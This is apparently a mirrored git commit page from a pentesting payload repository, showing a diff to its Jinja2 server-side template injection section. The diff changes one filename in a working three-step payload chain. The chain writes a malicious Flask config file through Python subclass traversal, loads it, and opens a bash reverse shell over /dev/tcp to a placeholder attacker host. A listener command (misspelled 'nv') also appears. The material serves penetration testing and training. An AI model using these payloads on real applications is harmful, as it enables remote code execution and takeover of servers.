mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Add Template injections + Jinja template injection
This commit is contained in:
parent
76b15d575e
commit
bb98bd9339
@ -53,7 +53,7 @@ nv -lnvp 8000
|
||||
Inject this template
|
||||
```python
|
||||
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }} # evil config
|
||||
{{ config.from_pyfile('/tmp/sokaexploit.cfg') }} # load the evil config
|
||||
{{ config.from_pyfile('/tmp/evilconfig.cfg') }} # load the evil config
|
||||
{{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host
|
||||
```
|
||||
|
||||
@ -61,4 +61,4 @@ Inject this template
|
||||
[https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
|
||||
|
||||
#### Training
|
||||
[https://w3challs.com/](https://w3challs.com/)
|
||||
[https://w3challs.com/](https://w3challs.com/)
|
||||
|
Loading…
Reference in New Issue
Block a user